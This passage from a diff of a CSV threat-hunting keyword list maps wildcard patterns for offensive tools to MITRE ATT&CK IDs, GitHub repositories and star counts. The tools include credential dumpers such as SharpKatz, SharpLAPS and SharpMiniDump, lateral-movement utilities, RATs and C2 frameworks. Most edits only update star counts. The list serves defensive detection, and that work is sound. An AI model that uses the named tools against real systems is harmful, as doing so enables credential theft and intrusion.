- TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpKatz.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
"*SharpkatzManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpLAPS.*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" -"*SharpLAPS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpLAPS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpLAPS-main*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLDAP.csproj*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLDAP.exe*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLDAP.sln*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLDAP-main*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - 
TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" "*SharpLdapRelayScan*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" -"*SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*SharpMapExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SharpMapExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpMiniDump*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpMiniDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMiniDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpMiniDumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpMove.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpNamedPipePTH.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMove.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNamedPipePTH.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.csproj*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" -"*SharpNoPSExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNoPSExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.exe*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec.sln*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec-master*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpPack*","offensive_tool_keyword","SharpPack","SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.","T1218.010 - T1218.011 - T1059 - T1127 - T1055","TA0002 - TA0008 - TA0006","N/A","N/A","POST Exploitation 
tools","https://github.com/mdsecactivebreach/SharpPack","1","0","N/A","N/A","2","145","34","2018-12-17T11:55:12Z","2018-12-17T10:51:19Z" -"*SharpPrinter.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpPrinter.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpPrintNightmare*","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","1736","587","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z" -"*sharpps $psversiontable*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*sharpps get-process*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpps $psversiontable*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - 
T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpps get-process*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*sharppsexec*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecService.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - 
T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpRDP.*.dll.bin*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*SharpRDP.csproj*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*SharpRDP.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpRDP.exe*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" 
-"*SharpRDP.sln*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.*.dll.bin*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.csproj*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRDP.exe*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.sln*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDPHijack.cs*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack.exe*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - 
TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack-master*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" -"*SharpRDP-master*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP-master*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*Sharpreflect *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*SharpReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
